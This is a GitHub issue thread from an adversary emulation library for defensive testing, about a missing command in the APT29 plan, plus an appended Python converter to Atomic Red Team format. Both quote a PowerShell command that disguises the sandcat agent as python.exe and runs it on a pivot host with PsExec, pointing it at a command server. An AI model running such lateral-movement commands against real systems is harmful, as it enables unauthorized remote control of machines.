center-for-threat-informed-defense / adversary_emulation_library

An open library of adversary emulation plans designed to empower organizations to test their defenses based on real-world TTPs.
https://ctid.io/adversary-emulation
Apache License 2.0

Missing code in the APT29 yaml file #92

Open Guillaume-Muller opened 3 years ago

Guillaume-Muller commented 3 years ago

In the APT29 yaml file, at line 1749, command of T1105 is missing below the "executors" tag :

line 1746   executors:
line 1747   - name: powershell
line 1748     command: |
line 1749
line 1750 - id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a

Thamane commented 3 years ago

Hello,

It is missing, but it should not be a problem execution-wise, as the part that is actually executed by Caldera is line 1722 (https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/6e8b057cf176619468fa3200c09dbdac4789f5f2/apt29/Emulation_Plan/yaml/APT29.yaml#L1722):

platforms:
    windows:
      psh,pwsh:
        command: |
          move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force;
          set-location "C:\Program Files\SysinternalsSuite\";
          .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}";
          tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe";
        payloads:
        - sandcat.go-windows-upx 
Guillaume-Muller commented 3 years ago

Thanks for your fast reply.

I'm currently a student and I'm trying to build a conversion script (like "ctid_aep_to_caldera.py") in order to use the yaml file with the Atomic framework. It is easier for me to directly copy the "executor" part because the Atomic yaml file is very similar (example below). By the way, don't you have that kind of script to convert to ATOMIC?

Atomic YAML file : supported_platforms:


-- Regards.

Guillaume MULLER

Thamane commented 3 years ago

Sorry I do not have such a script at hand.

In your case, just copying the command at line 1722 and pasting it at line 1749 will solve your problem. The executors yaml key is not parsed by Caldera and is probably here for backward compatibility/cross-compatibility with other frameworks like ATOMIC? At least that is what is explained in this blog article:

The machine-readable Emulation Plan representation would be implemented in YAML. The YAML format would be as consistent as possible with accepted industry approaches to automated emulation. In the case of our YAML format, we started from the established Red Canary Atomic Red Team format but made some modifications to capture the threat intelligence that informs the emulation and to ensure a direct correlation between the human-readable and machine-readable versions of the Emulation Plan.
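The conversion this thread is working toward, as an added example that is not part of the adversary_emulation_library and not the ctid_aep_to_caldera.py script: it turns a CTID ability (as loaded by yaml.safe_load) into an Atomic Red Team test, taking the command from the `platforms` block that Caldera actually runs and treating the `executors` entry only as a fallback, so an empty `command: |` like the one at line 1749 never becomes an empty test. The ability keys `id`, `executors`, `platforms.<os>.<executor>.command` and `payloads` come from the snippets in this issue; the `name`, `description` and `technique.attack_id` keys, the executor-name mapping, the placeholder ability id and the PsExec-style sample are assumptions or constructed for the example.

```python
#!/usr/bin/env python3
"""Convert CTID emulation-plan abilities into Atomic Red Team tests.

Added example, not library code. Works on the dict yaml.safe_load() returns
for a plan such as APT29.yaml; `name`, `description`, `technique.attack_id`
and the executor-name mapping are assumptions, the rest follows this issue.
"""
import json
import re
import sys
import textwrap

try:
    import yaml  # PyYAML; optional, only used to read/write real plan files
except ImportError:
    yaml = None

# Caldera executor keys -> Atomic Red Team executor names (assumed mapping).
EXECUTOR_MAP = {"psh": "powershell", "pwsh": "powershell", "cmd": "command_prompt"}
# Caldera facts/variables look like #{name} or #{fact.with.dots}.
FACT_RE = re.compile(r"#\{([A-Za-z0-9_.]+)\}")


def executed_command(ability, platform="windows"):
    """Return (executor, command, payloads) the way Caldera resolves them.

    Caldera runs platforms.<os>.<executor>.command and ignores the top-level
    `executors` list, so the platforms block is the source of truth; an empty
    `command: |` under `executors` (line 1749 here) is skipped, not emitted.
    """
    for key, body in ((ability.get("platforms") or {}).get(platform) or {}).items():
        body = body or {}
        cmd = (body.get("command") or "").strip()
        if cmd:
            first = key.split(",")[0]  # "psh,pwsh" lists alternative interpreters
            return EXECUTOR_MAP.get(first, first), cmd, list(body.get("payloads") or [])
    for ex in ability.get("executors") or []:
        cmd = ((ex or {}).get("command") or "").strip()
        if cmd:
            return ex.get("name", "powershell"), cmd, []
    raise ValueError(f"ability {ability.get('id')!r}: no non-empty command for {platform}")


def to_atomic_test(ability, platform="windows"):
    """Build one entry of an Atomic Red Team `atomic_tests` list."""
    executor, command, payloads = executed_command(ability, platform)
    args = {}

    def to_arg(match):
        # Atomic argument names cannot contain dots: #{user.session.id}
        # becomes #{user_session_id} in both the command and input_arguments.
        name = match.group(1).replace(".", "_")
        args.setdefault(name, {"description": f"value of Caldera fact {match.group(1)}",
                               "type": "string", "default": f"<{name}>"})
        return "#{" + name + "}"

    command = FACT_RE.sub(to_arg, command)
    # Caldera drops payloads next to its agent; Atomic checks them as dependencies.
    deps = [{"description": f"payload {p} must be in the working directory",
             "prereq_command": f'if (Test-Path "{p}") {{ exit 0 }} else {{ exit 1 }}',
             "get_prereq_command": f'Write-Host "copy {p} from the emulation plan resources"'}
            for p in payloads]
    return {
        "name": ability.get("name", ability["id"]),
        "auto_generated_guid": ability["id"],
        "description": ability.get("description", "converted from a CTID emulation plan"),
        "supported_platforms": [platform],
        "input_arguments": args,
        "dependency_executor_name": executor,
        "dependencies": deps,
        # PsExec-style lateral movement needs admin; True is a conservative default.
        "executor": {"name": executor, "command": command, "elevation_required": True},
    }


def to_atomic_document(abilities, technique_id, platform="windows"):
    """Group every ability tagged with technique_id into one Atomic YAML document."""
    tests = [to_atomic_test(a, platform) for a in abilities
             if (a.get("technique") or {}).get("attack_id") == technique_id]
    return {"attack_technique": technique_id, "display_name": technique_id,
            "atomic_tests": tests}


# Constructed sample mirroring the T1105 ability in this issue: the `executors`
# command is empty (line 1749) and the platforms command is the real one.
SAMPLE_ABILITY = {
    "id": "11111111-2222-4333-8444-555555555555",  # placeholder, not the plan's id
    "name": "Ingress tool transfer via PsExec",     # assumed key
    "technique": {"attack_id": "T1105"},            # assumed key
    "executors": [{"name": "powershell", "command": ""}],
    "platforms": {"windows": {"psh,pwsh": {
        "command": textwrap.dedent(r'''
            move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force;
            set-location "C:\Program Files\SysinternalsSuite\";
            .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}";
            tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe";
        ''').strip(),
        "payloads": ["sandcat.go-windows-upx"],
    }}},
}


def main(argv):
    if len(argv) > 1 and yaml is not None:  # usage: convert.py APT29.yaml T1105
        with open(argv[1]) as fh:  # plan file assumed to be a top-level YAML list
            abilities = [a for a in yaml.safe_load(fh) if isinstance(a, dict) and "id" in a]
    else:
        abilities = [SAMPLE_ABILITY]
    doc = to_atomic_document(abilities, argv[2] if len(argv) > 2 else "T1105")
    print(yaml.safe_dump(doc, sort_keys=False) if yaml else json.dumps(doc, indent=2))


if __name__ == "__main__":
    main(sys.argv)
```

Run without arguments it converts the constructed sample and prints the Atomic document (YAML if PyYAML is installed, JSON otherwise); with a plan path and technique id it converts every matching ability from that file. The point worth keeping from the thread is the source of the command: reading `platforms` first means the converter behaves like Caldera does, and the empty `executors` command is only ever a problem if nothing else is there, in which case the script refuses rather than emitting a test that runs nothing.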